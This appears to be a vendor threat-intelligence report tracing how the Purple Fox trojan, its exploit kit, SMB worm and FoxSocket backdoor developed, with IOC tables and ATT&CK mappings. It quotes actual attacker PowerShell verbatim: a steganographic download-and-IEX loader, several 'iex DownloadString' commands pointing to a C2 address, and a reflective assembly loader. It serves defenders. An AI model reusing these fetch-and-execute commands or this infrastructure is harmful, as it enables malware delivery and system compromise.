The trojan known as Purple Fox was first discovered by 360 Total Security on September 25th 2018. At the time of publishing, the statistics they had gathered estimated that over thirty-thousand (30,000) users were affected by the malware. Since its debut, there have been a number of updates and additions to Purple Fox that have ensured it has remained notable in the threat landscape. This report aims to provide an overview of everything currently known regarding Purple Fox and the various changes and additions to its functionality over time.
The first reported instance of Purple Fox was in an analysis carried out by 360 Total Security (360 Total Security, 2018) examining a trojan that drops itself using an MSI installation package, and alters registry values to replace a legitimate Windows system file.
The initial stage of infection often relies on a third party Exploit Kit (EK) called RIG EK. Victims browse to compromised or malicious websites hosting the EK which then drops the malware onto the victims system. The initial dropper is an installation package created using Nullsoft Scriptable Install System (NSIS).
The built-in Windows installer msiexec.exe is leveraged to run the installation package retrieved from the website. The installation package in turn drops two files into the Windows directory: winupdate64.log, a malicious DLL that acts as a loader and sysupdate.log, the payload of the malware.
The installer then changes the value of the registry key PendingFileRenameOperations, located at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager. As a result of this change, when the system next boots the Windows Session Manager (smss.exe) will read the altered registry value and follow the instructions that have been added. This involves moving the Windows System Event Notification Service (SENS) module sens.dll to a new location, renamed as C:\Windows\AppPatch\Acpsens.dll. The winupdate64.log file is then moved from its original location and renamed as C:\Windows\System32\sens.dll. The sysupdate.log file is also renamed and relocated to the path C:\Windows\AppPatch\Ke990129.xsl, the file name potentially varying across variants of the malware.
The malicious DLL winupdate64.log, now renamed as sens.dll, is loaded in place of the original system file with system-level privileges and decrypts and executes the contents of the payload (Ke990129.xsl/sysupdate.log), which consists of a DLL and a rootkit driver.
The decrypted payload contents are saved to the System32 directory and then loaded into a spawned but suspended svchost.exe process. The driver is saved as C:\Windows\System32\dump_{random hex values}.sys while the DLL file is saved as C:\Windows\System32\Ms{random hex values}App.dll. As final steps the malicious sens.dll is deleted and the original sens.dll is restored to its original name and location. After infection, Purple Fox is often used to retrieve and deploy other types of malware, commonly cryptocurrency mining malware.
Type |
Indicator |
Relevance |
IP Addresses |
216.250.99.5 [Missouri, US] |
The dropper domain for the malicious installation package. |
File Names |
wpltbbrp_011up.jpg |
Malicious MSI installation package. |
winupdate64.log |
Loader DLL dropped by installer. |
|
sysupdate.log |
Payload dropped by installer. |
|
Paths |
C:\\Windows\System32\ |
Multiple dropped files are copied to this directory. |
C:\\Windows\AppPatch\ |
Replaced system file (sens.dll) is moved to this directory. |
ID |
Technique |
Context |
T1036 |
Masquerading |
One of the files dropped by the installer is renamed and placed in the location of a legitimate Windows system file (sens.dll). |
T1569 |
System Services |
By altering registry values, Purple Fox is able to leverage Windows System Manager (smss.exe) to replace a system file with a malicious loader, which is then automatically run by Windows. |
T1218 |
Signed Binary Proxy Execution |
msiexec.exe is used to execute the malicious installation package which drops the malware. As msiexec.exe is signed and native it can be used to bypass application control systems. |
Where Purple Fox previously relied on NSIS-compiled installers to drop and execute its components, Trend Micro have since analysed a new version of the malware which makes use of Powershell instead (Trend Micro, 2019). This allows Purple Fox the capability of fileless infection. Trend Micro also reported additional privilege escalation vulnerabilities being leveraged to increase the likelihood of a successful infection .
Once a user accesses a malicious web page hosting the RIG exploit kit the user is redirected to a malicious Powershell script, masquerading as a .jpg image file, which either directly downloads Purple Fox’s main component or attempts to escalate privileges. The following vulnerabilities can be exploited in order to execute the malicious Powershell script:
If the current user does not have administrator privileges, Powersploit modules will be used in an attempt to gain elevated privileges. These Powersploit modules specifically target flaws in the Win32k driver, CVE-2015-1701 and CVE-2018-8120.
Once the script has gained administrative privileges it then proceeds to retrieve and execute a malicious Microsoft Installer (.msi) package, also masquerading as an image file, by leveraging the application programming interface (API) of msi.dll. As with the previous version of Purple Fox analysed, this results in msiexec.exe downloading and running the installer file and the infection chain continuing as previously detailed.
One significant difference from previous versions of Purple Fox is the use of open source code, named hidden (3. Kornev, 2019), to enable its rootkit components. This code allows Purple Fox to hide both registry keys and files from detection methods.
Type |
Indicator |
Relevance |
MD5 Hashes / File Names |
4facb81f57e515a508040270849bcd35 1808164.jpg |
CVE-2018-8120 exe exploit file (64 bit). Dropped by Powersploit module. |
3fe38271b009298b4cb0b01ef57edbf3 1808132.jpg |
CVE-2018-8120 exe exploit file (32 bit). Dropped by Powersploit module. |
|
B43442df320d1f89defd772991b6335c 1505132.jpg |
CVE-2015-1701 exe exploit file. Dropped by Powersploit module. |
|
1b213242972094fbc04160d9d6bc74f9 MsE7DEA78AApp.dll |
Purple Fox main component dll. Downloaded via malicious Powershell script. |
|
ae3e7304122469f2de3ecbd920a768d1 1603264.jpg |
CVE-2015-1701 exe exploit file. Dropped by Powersploit module. |
|
fd6236ef6a96c1acf05bae3874ff6326 1.htm-1 |
CVE-2018-8174 .htm exploit file. Dropped by Rig EK. |
|
2b75d6eb8626a0d8a7b67744dd2f3b84 2.htm-1 |
CVE-2014-6332 .htm exploit file. Dropped by Rig EK. |
|
a875e14f20afb3a8e37e1447d920466e pe.jpg |
Powersploit Module |
|
6467874d952a5ffc1edfd7f05b1cc86d 1505164.jpg |
CVE-2015-1701 exe exploit file. Dropped by Powersploit module. |
|
beac6592dbd3a479a64789e43ec20f27 1603232.jpg |
CVE-2015-1701 exe exploit file. Dropped by Powersploit module. |
|
5009e9fc94b07ad93374ac920711bc73 1.swf |
CVE-2018-15982 .swf (flash) exploit file. Dropped by Rig EK. |
Type |
Indicator |
Relevance |
IP Addresses |
http[:]//141[.]98[.]216[.]130/1808164[.]jpg |
URL hosting CVE-2018-8120 exploit exe (64 bit) |
http[:]//141[.]98[.]216[.]130/1603264[.]jpg |
URL hosting CVE-2015-1701 exploit exe (32 bit) |
|
http[:]//141[.]98[.]216[.]130/1505164[.]jpg |
URL hosting CVE-2015-1701 exploit exe (64 bit) |
|
http[:]//141[.]98[.]216[.]130/1808132[.]jpg |
URL hosting CVE-2018-8120 exploit exe (32 bit) |
|
http[:]//141[.]98[.]216[.]130/1603232[.]jpg |
URL hosting CVE-20150-1701 exploit exe |
|
http[:]//141[.]98[.]216[.]130/1505132[.]jpg |
URL hosting CVE-20150-1701 exploit exe |
|
http[:]//141[.]98[.]216[.]130/pe[.]jpg |
URL hosting Powersploit privilege escalation module |
|
URL |
http[:]//jeitacave[.]org/ps004[.]jpg |
URL hosting malicious Powershell script |
Domain Name |
http[:]//nw[.]brownsine[.]com/ |
URL hosting Rig Exploit Kit |
http[:]//zopso[.]org/ |
URL hosting Rig Exploit Kit |
ID |
Technique |
Context |
T1189 |
Drive-by Compromise |
Purple Fox uses the Rig exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks. |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes Powershell commands to download it’s main payload. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1014 |
Rootkit |
Purple Fox uses an open source rootkit to hide the files and registry entries it creates. |
On July 7th 2020 Proofpoint detailed how Purple Fox no longer relied on the RIG exploit kit (EK) to deliver its exploits (Proofpoint, 2020). Development of a new EK, dubbed Purple Fox EK, had allowed Purple Fox to continue integrating new exploits into its arsenal. That report also details the addition of vulnerabilities CVE-2020-0674 and CVE-2019-1458, a scripting engine memory corruption vulnerability in Internet Explorer and local privilege elevation vulnerability respectively, into the Purple Fox EK.
In the case of CVE-2020-0674 the Purple Fox EK targets the RegExp function within the jscript.dll file utilised by Internet Explorer. In doing so Purple Fox EK is able to import the functions GetModuleHandleA, GetProcAddress and VirtualProtect from kernel32.dll, allowing the exploit to load and trigger shellcode provided by the EK. Once the shellcode is triggered a new process is created using the function WinExec which runs the command mshta <payload url>, downloading and executing a malicious .hta file on the victim's system.
The final payload is the same as documented in 360 Total Security's initial report (360 Total Security, 2018), and in the first section of this overview. Below is documentation on differences in the initial staging of the payload and other new observations.
The .hta file first uses Windows Management Instrumentation (WMI) to query the current Operating System (OS) version and will attempt to run the payload differently depending on the Major Version that is returned. It then creates a Wscript.Shell object which is used to execute the next steps:
When executing the command via Powershell, if the current user does not have administrator privileges the script will attempt to gain admin privileges using local privilege escalation exploits. Purple Fox has previously been observed exploiting CVE-2018-8120 and CVE-2015-1701 via PowerSploit (documented in the previous section), however this mid-2020 version of the malware also contains a more recent privilege escalation exploit, CVE-2019-1458. Once administrator privileges are obtained, the .hta file will execute the commands documented above.
These commands download and execute a remote .msi file which contains encrypted shellcode as well as 32 and 64 bit versions of the payload.
Type |
Indicator |
Relevance |
Domain Names |
casestudybuddy[.]club |
URL which redirects vulnerable users to a domain hosting the Purple Fox EK |
shiory[.]annebruce[.]xyz |
Purple Fox EK Host |
|
MD5 Hashes / File Names |
3c3a5335282a5a9c73207a154002be28 hso9ygwhapvkpcgp1.hta |
Purple Fox .hta Payload Stager |
URLs |
https[:]//raw.githack[.]xyz/SdTC8df7vmDNIUuV1.jpg |
Purple Fox MSI Payload Stager |
https[:]//raw.githack[.]xyz/1DHRBFPLZTEQRRBUB.jpg |
Purple Fox MSI Main Component |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/pe.jpg |
PowerSploit Functions |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1905864.jpg |
64-bit exploit for CVE-2019-1458 |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808132.jpg |
32-bit exploit for CVE-2018-8120 |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808164.jpg |
64-bit exploit for CVE-2018-8120 |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505132.jpg |
32-bit exploit for CVE-2015-1701 |
|
https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505164.jpg |
64-bit exploit for CVE-2015-1701 |
ID |
Technique |
Context |
T1189 |
Drive-by Compromise |
Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks. |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes Powershell commands to download a malicious .msi file. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.005 |
Signed Binary Proxy Execution: Mshta |
Purple Fox uses mshta.exe to execute malicious .hta files on target systems. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious.msi file which drops the main components of the malware. |
Over the years the exploitive techniques of Purple fox have improved substantially. Previous versions of the malware downloaded exploits for Local Privilege Escalation (LPE) vulnerabilities in the form of binary files renamed with image file extensions, such as update.jpg. As this technique is easily detected by antivirus and endpoint security solutions a new method was devised. The version of Purple Fox detailed in SentinelOne's analysis (13. Sentinel Labs, 2020) instead retrieves actual image files that contain the exploits embedded within them using steganography. The following PowerShell command is used to download one of the images and extract and execute the embedded LPE payload contained within:
$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3")); $o=a Byte[] 589824; (0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_); $o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}}; IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))' IEX ($uyxQcl8XomEdJUJd) |
SentinelOne also reported that two additional LPE exploits were being used by Purple Fox: CVE-2020-1054 and CVE-2019-0808. Their analysis traced the exploit binaries used to public GitHub repositories. Most notably it was discovered that these exploits set and check the value StayOnTop within the registry key HKCU\Software\7-zip in order to determine if the payload was successfully executed. This key value is not used by the legitimate 7-Zip software, providing a consistent indicator of compromise for the execution of the exploits and Purple Fox infection.
Purple Fox's code obfuscation has also been improved by using VMProtect to pack the msi files downloaded by the dropper. This makes reverse engineering the code much more complicated. However, the report indicates that the payload portion of Purple Fox has not changed substantially and still employs similar methods, such as using the open source hidden project as its rootkit, as previous versions of the payload.
Type |
Indicator |
Relevance |
Domain Names |
speedjudgmentacceleration[.]com rawcdn[.]githack[.]cyou dl[.]gblga[.]workers.dev dl[.]fmhsi[.]workers.dev |
Domains hosting the Purple Fox Exploit Kit. |
MD5 Hashes / File Names |
c82fe9c9fdd61e1e677fe4c497be2e7908476d64 CVE-2019-1458.exe e43f98c0698551f997649c75a2bfe988f72060c0 CVE-2020-1054.exe 82af45d8c057ef0cf1a61cc43290d21f37838dd1 cve_2019_0808.exe 6cac8138f1e7e64884494eff2b01c7b1df83aef2 rootkit_from_cve_2019_0808.msi e65c1a74275e7099347cbec3f9969f783d6f4f7d cve_2019_0808.ps1 bdeed6792463713806f39c3b5abc0d56f176e88f key1.bin 921d1beb3c48b03e20ba1ea07ea1c8f8fc97ec8e key2.bin 2c5c07c969dd715d0e696f8a8e9e6754a9114d4e key3.bin 5a680f659c91870a819ede06746f21282a4929d1 key4.bin 60f2624c39f61ec6c2eff09d463ca57d9a227b9b key5.bin bd00f0e6e8cbe0b486fe0aad9e6e38ea606f7044 key6.bin 9ba5e84fccf1012343ba72e9584c6af3beb8b361 key7.bin 57b4eac452c2e8c73222d0915a97a63b43d391de key8.bin 57b4eac452c2e8c73222d0915a97a63b43d391de key9.bin c21b1397d25ece8221e981eb5289c592f71ab4ca rootkit_encrypted_payload 0470d80daf464b5ea5ee80e2db18e0582f6dbfaf rootkit_x86 bc9766d405913a6162d3747a5a7d0afe1857ac88 rootkit_x64 |
Example of malicious files, either the malware itself or related such as additional files dropped by the malware. |
ID |
Technique |
Context |
T1189 |
Drive-by Compromise |
Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks. |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes powershell commands to download a malicious .msi file. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.005 |
Signed Binary Proxy Execution: Mshta |
Purple Fox uses mshta.exe to execute malicious vbscript code on target systems. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1027.003 |
Obfuscated Files or Information: Steganography |
Jpeg files are downloaded via Powershell which contain local privilege escalation exploit code. |
T1027.002 |
Obfuscated Files or Information: Software Packing |
Purple Fox uses the VMProtect software to pack its rootkit. |
T1112 |
Modify Registry |
Purple Fox will check for a registry value named “StayOnTop” under the HKCU:\Software\7-Zip key. This is done to determine if the payload ran successfully, suggesting that Purple Fox modifies the registry entry. |
T1014 |
Rootkit |
Purple Fox uses an open source rootkit to hide the files and registry entries it creates. |
Further investigation of Purple Fox over time led to the identification of a new spreading mechanism via the exploitation of Server Message Block (SMB) protocol (6. Guardicore, 2021). In addition, the malware appeared to use compromised systems as hosts for the Purple Fox payloads which would then be used to infect other systems. This method of infection allows for Purple Fox to spread without any user action, akin to a worm, where previous methods relied on victims falling for phishing attacks.
Access to compromised systems is achieved through scanning for exposed SMB ports (port TCP445), and initiating brute force attacks against the target hosts authentication systems. In the event that access is gained the malware establishes persistence by creating a service on the compromised system utilising the naming convention AC0{x}, where x represents an integer between one (1) and nine (9). The newly created service is responsible for iterating through a list of dropper URLs for the Purple Fox MSI installer. The msiexec.exe process is executed with the /i flag to install from a remote host, and the /Q flag to run without any user prompts, obscuring the operation.
During the installation process, in which the payload is deployed and executed, the malware also modifies the Windows firewall by utilising native utility netsh.exe. A new policy named ‘Qianye’ is added, with a filter (titled ‘Filter1’) to prohibit inbound traffic from all external IP addresses on ports 445, 139 and 135 (TCP and UDP). This is likely done to prevent reinfection or infection from a different attacker. An IPv6 interface is also installed on the system to later allow the malware to port scan IPv6 addresses.
After the malware has been installed and the system restarted, the malware will continue the cycle of infection by attempting to propagate from the infected machine through SMB by port scanning other devices and brute forcing authentication.
Type |
Indicator |
Relevance |
IP Addresses |
57.167.200.174 120.253.201.237 65.222.221.216 65.113.192.79 77.236.130.107 180.68.57.112 95.161.197.174 60.174.95.143 115.230.127.107 |
Purple Fox C2 Servers |
Domain name |
rpc.1qw.us |
Purple Fox C2 Server |
File names |
Winupdate64.dll winupdate32.dll |
64bit and 32bit DLL payloads dropped by the malicious installer. |
Service names |
AC0x |
Service created to drop and execute Purple Fox. Follows naming convention where ‘x’ represents a value between one (1) and nine (9). |
ID |
Technique |
Context |
T1021.002 |
Remote Services: SMB/Windows Admin Shares |
Purple Fox will brute force vulnerable SMB services to gain initial access. |
T1110.001 |
Brute Force: Password Guessing |
Purple Fox uses brute force password attacks to gain access to SMB services |
T1543.003 |
Create or Modify System Process: Windows Service |
The worm payload creates a new service to download further malware payloads. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1562.004 |
Impair Defences: Disable or Modify System Firewall |
A firewall rule is created to limit the systems exposure to other attackers |
T1014 |
Rootkit |
Purple Fox uses an open source rootkit to hide the files and registry entries it creates. |
T1046 |
Network Service Scanning |
Purple Fox will IP ranges on port 445 to discover any further exposed SMB services to exploit. |
On April 4th 2021, HP Wolf Security carried out an investigation on a new sample of Purple Fox (7. HP Wolf Security, 2021). They discovered that it had enhanced its initial exploitation abilities through the addition of an exploit for CVE-2021-26411, another memory corruption vulnerability in Internet Explorer.
The code used by Purple Fox to exploit this vulnerability closely matches that of a proof of concept (POC) released by security researchers at Enki (8. Enki, 2021). The exploit is obfuscated in several layers and encrypted using Advanced Encryption Standard (AES), however, once the researchers were able to recover the source code they noted that the only major difference between the Enki POC and the exploit used by Purple Fox was the length of the shellcode, with the Purple Fox shellcode being several times longer than that used in the Enki POC.
As seen in previous Purple Fox infections, the initial exploitation takes place via drive-by-compromise. In this case, victims entering a search term into google visited a web page that redirects to a site hosting the Purple Fox Exploit Kit (EK).
Unlike previously observed variants of the Purple Fox EK, this variant uses geofencing to ensure that users from certain regions are not redirected to the EK, users from the UK, USA, France, Germany and the Netherlands were not targeted. However, users from Italy, Switzerland, Ireland, Sweden and Japan would be redirected and exploited if their browsers were vulnerable.
Similar to the exploit chain of Purple Fox detailed in previous sections of this report, the initial stage of the malware exploits the mshta utility to download and execute a malicious Powershell script. Once executed, if the user does not have administrative privileges, several Powershell vulnerabilities can be utilised to gain elevated privileges before the installation of the Purple Fox msi malware file.
Type |
Indicator |
Relevance |
Domain Names |
www.loislandgraf[.]us www.healthier-patriot[.]shop iauisdoenki[.]xyz eyoruas.iauisdoenki[.]xyz veoipc.ahntncaiiribi[.]xyz ahntncaiiribi[.]xyz cnghfekiutetw[.]xyz iauisdoenki[.]xyz ktecydnn[.]xyz vmendehep[.]xyz ktecydnn[.]xyz broad-block-d151.weteon.workers[.]dev plain-forest-2233.ethcrartb.workers[.]dev shy-feather-00c8.itttsfbir.workers[.]dev summer-shadow-5f60.oryfannne.workers[.]dev rawcdn.githack[.]net |
A relevant domain such as a malicious domain the malware is dropped from. |
MD5 Hashes / File Names |
0fea69bc3003014f7869120226645a88 example.xlsm |
Example of malicious files, either the malware itself or related such as additional files dropped by the malware. |
ID |
Technique |
Context |
T1189 |
Drive-by Compromise |
Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks. |
T1218.005 |
Signed Binary Proxy Execution: Mshta |
Purple Fox uses mshta.exe to execute malicious vbscript code on target systems. |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes powershell commands to download a malicious .msi file. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1027.003 |
Obfuscated Files or Information: Steganography |
Jpeg files are downloaded via Powershell which contain local privilege escalation exploit code. |
On July 1st 2021 Trend Micro published an analysis of Purple Fox attacks making use of Web Proxy Auto-Discovery Protocol (WPAD) domains as yet another method of infecting users with the malware (9. Trend Micro,2021). Despite the fact that WPAD attacks are well documented and the vulnerability has existed for a significant amount of time, it is still considered a viable attack technique.
WAPD is an automatic discovery protocol that locates browser configuration files on a local network. Because the domains used to locate the files are also capable of being interpreted as external domains if queried on public Domain Name System (DNS) servers, attackers can register matching domains and use them to serve malware (12. Sophos, 2016).
Targets of the malware appeared to be accessing the wpad.id domain which is situated in Indonesia based on the top level domain, i.e .id. As it stands no other countries have been found to be targeted by the malware. By implementing this technique a zero click attack, an attack that does not require user interaction, could be executed, as the WPAD URL would be accessed whenever the system is started.
To take advantage of and exploit the WPAD protocol, the Purple Fox creators registered the wpad.id domain using Cloudflare. The URL is then loaded for WPAD services, located at http://wpad[.]id/wpad[.]dat. Once the URL is loaded it returns a Javascript version of the Internet Explorer remote code execution vulnerability CVE-2019-1367 with customised shellcode.
The shellcode downloads the next part of the attack chain from the URL http://9kf[.]me/in[.]php?id=1. It has been reported that the domain 9kf.me is no longer accessible but alternative domains 2kf.me and 6kf.me were active at the time of the publication of Trend Micro’s report and were observed to serve the same payload. Cloudflare servers are used to proxy the domain resolution and access to the attack chain artefacts. In their analysis of the attack chain Trend Micro observed exploits for the privilege escalation vulnerabilities CVE-2020-1054, CVE-2018-8120 and the vulnerability disclosed in MS15-051. It was found that the binary that was used to exploit MS15-051 contains a reference in a symbol file path to K8Team, which is notable as K8Team are responsible for updating and maintaining CVE exploits and different hack tools.
Type |
Indicator |
Relevance |
URLs |
http[:]//2kf[.]me/in[.]php http[:]//6kf[.]me/in[.]php http[:]//9kf[.]me/in[.]php |
|
MD5 Hashes / File Names |
b2817912893fca1e95668e1add566402 1808132.jpg |
CVE-2018-8120 exploit exe |
b43442df320d1f89defd772991b6335c 1505132.jpg |
CVE-2015-1701 exploit exe |
|
pe_1 3d94be7162902bde5973c1055b346b51 |
CVE-2019-0808 exploit exe |
|
Winupdate32.log dd0ce41fac1c5a1cc80e3faa53bb9d69 |
Purple Fox rootkit component |
ID |
Technique |
Context |
T1189 |
Drive-by Compromise |
Purple Fox utilises WPAD protocol to deliver a malicious javascript exploit which acts as a dropper for further malware. |
In July of 2021 it was discovered that a new proof of concept for a Windows remote printer vulnerability was accidentally disclosed. This vulnerability was dubbed PrintNightmare and appears to work on multiple fronts. Exploiting the vulnerability can allow a user to perform remote code execution through the Windows Print Spooler service and launch attacks on other systems in a local network. In addition, as the arbitrary code is run with SYSTEM level privileges, it also serves as a local privilege escalation vulnerability and could allow attackers to gain control over high level systems such as Domain Controllers.
Shortly after this initial vulnerability was discovered it was revealed that PrintNightmare can affect almost every standard modern Windows version. The vulnerability was recognised officially as CVE-2021-34527. An article produced by 360 Total Security (10. 360 Total Security, 2021) found that Purple Fox’s botnets were using PrintNightmare to launch attacks in a cryptocurrency mining campaign.
Following the compromise of a system, reported to be accomplished through brute force attacks against MsSQL databases, Purple Fox injects a malicious Dynamic link library named AwNKBOdTxFBP.dll into the Windows print spooler service spoolsv.exe. From spoolsv.exe the dll then injects malware into rundll32.exe and then uses Powershell to download and execute the malware on the system. At which point the victim system becomes another node in the Purple Fox botnet, carrying out cryptocurrency mining operations while attempting to move laterally and compromise other systems in the network.
Type |
Indicator |
Relevance |
URLs |
hxxp://6kf[.]me/dl.php |
URL hosting a malicious msi file. |
MD5 Hashes / File Names |
45c3f24d74a68b199c63c874f9d7cc9f 45c3f24d74a68b199c63c874f9d7cc9f.virus |
Meterpreter File |
bc625f030c80f6119e61e486a584c934 bc625f030c80f6119e61e486a584c934.virus |
Meterpreter File |
ID |
Technique |
Context |
T1210 |
Exploitation of Remote Services |
Purple Fox exploited the Windows Print Spooler service to execute code on remote systems. |
T1055.001 |
Process Injection: Dynamic-link Library Injection |
Purple Fox injects a malicious DLL into shell32.dll process which spawns a malicious Powershell process. |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes Powershell commands to download a malicious .msi file. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
In October 2021 Trend Micro published a report detailing a new Purple Fox backdoor called FoxSocket, which uses WebSockets to communicate with its command-and-control (C2) servers (14. Trend Micro, 2021). The backdoor was discovered during analysis of a compromised server.
The infection chain observed was similar to previous Purple Fox infections. A drive-by compromise leads to the execution of a malicious Powershell script which executes further scripts to elevate privileges if required. The payload is then executed, dropping two components, dbcode21mk.log and setupact64.log, to the Windows directory. Registry values under the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager key are then set to move and replace sens.dll with setupact64.log upon system restart. Some time after infection, the dropper for FoxSocket is retrieved by Purple Fox using the following Powershell commands:
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))" "cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))" |
The payload URLs in the commands serve two variants of an additional Powershell script that downloads the backdoor:
$_0000 = 0 while($_0000 -1t 16) $_0001 =(new-object net.webclient).DownloadData('hxxp[:]//185.112.144.245/a/data') $_0002 =[System.Reflection.Assembly]::Load($_0001) $_0003 = $_0002.EntryPoint [string[]] $_0004 = @(BASE64_Encoded_Data) [Object[]] $_0005 = @(, $_0004) $_0003.Invoke($_0006, $_0005) $_0000++ sleep 5 |
The two variants differ in the Base64 encoded data passed as an argument to the object downloaded from the remote server and invoked by the dropper. The data consists of configuration parameters used to choose a C2 server and set up a communications channel. Historical analysis by Trend Micro revealed that the number of available subdomains for the C2 server had increased significantly from earlier iterations of the backdoor.
The WebSocket communications used by FoxSocket allow for a bidirectional channel to be established between the victim and the C2 server.
Communication with the C2 server is established and the connection is maintained by sending keepalive messages, which prevents the connection from being closed due to inactivity. Messages are then exchanged between the victim and the C2 server to negotiate an end-to-end encrypted session. The final step involves the victim machine sending information such as username, machine name, local IP address, MAC address and Operating System version to the C2 server to establish a profile and then listening for further instructions. Trend Micro were able to discern the following commands that were observed to be sent from the C2 server:
Command code |
Functionality |
20 |
Send the current date on the victim machine |
30 |
Retrieve results of DriveInfo.GetDrives() for all drives |
40 |
Retrieve results of DirectoryInfo() for a specific directory |
50 |
Retrieve results of FileInfo() for a specific file |
60 |
Perform recursive directory search |
70 |
Execute WMI queries using ManagementObjectSearcher() |
80 |
Close the WebSocket Session |
90 |
Exit the process |
100 |
Spawn a new process |
110 |
Download data from a specific URL to the victim machine |
120 |
DNS lookup from the victim machine |
130 |
Retrieve file contents of a specific file |
140 |
Write data to a specific location |
150 |
Download data and write to a specific file |
160 |
Renegotiate session key for symmetric encryption |
180 |
Get current process ID/Name |
210 |
Return the configuration parameter for the backdoor |
220 |
Kill the process and start a new process with a different config |
230 |
Kill process with a specific PID |
240 |
Query internal backdoor object properties |
260 |
Retrieve hash values of specific files |
270 |
Kill multiple processes with list of specific PIDs |
280 |
Delete list of specific files/directories |
290 |
Move list of specific files/directories to another location |
300 |
Create a new directory in a specific location |
Type |
Indicator |
Relevance |
Domain Names |
57.167.200.174 120.253.201.237 65.222.221.216 65.113.192.79 77.236.130.107 180.68.57.112 95.161.197.174 60.174.95.143 115.230.127.107 |
Purple Fox C2 Servers |
IP Address |
93.95.226.157 93.95.227.183 93.95.228.163 185.112.144.101 185.112.146.72 185.112.146.83 185.112.147.50 |
Purple Fox C2 Servers |
MD5 Hashes / File Names |
14e25a99d192da7cc611d3288948238d |
Malicious PowerShell scripts |
MD5 Hashes / File Names |
243aa234a8aabc58f964913f6f30d925 Client_net_framework.exe e4a7e1af290d1de580fb8e1bf8b22e1e Client_net_framework.exe c2f8fea5752685fedbddc988dee00c60 Client_net_framework.exe 0f2439076b53afdff994446d6a3963e5 Client_net_framework.exe 98ff9fb7cd029d54c1a01506d16f75af Client_net_framework.exe |
Purple Fox backdoor components |
ID |
Technique |
Context |
T1059.001 |
Command and Scripting Interpreter: PowerShell |
Purple Fox invokes powershell commands to download a malicious .msi file. |
T1068 |
Exploitation for Privilege Escalation |
Purple Fox uses several exploit modules to exploit various Powershell vulnerabilities and gain administrator privileges. |
T1218.007 |
Signed Binary Proxy Execution: Msiexec |
Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware. |
T1112 |
Modify Registry |
Purple Fox will check, remove and create registry keys to ensure persistence. |
T1027.002 |
Obfuscated Files or Information: Software Packing |
Purple Fox uses the VMProtect software to pack its rootkit. |
T1014 |
Rootkit |
Purple Fox uses an open source rootkit to hide the files and registry entries it creates. |
T1071.001 |
Application Layer Protocol: Web Protocols |
Purple Fox initiates communication with its C2 servers via Websockets. |
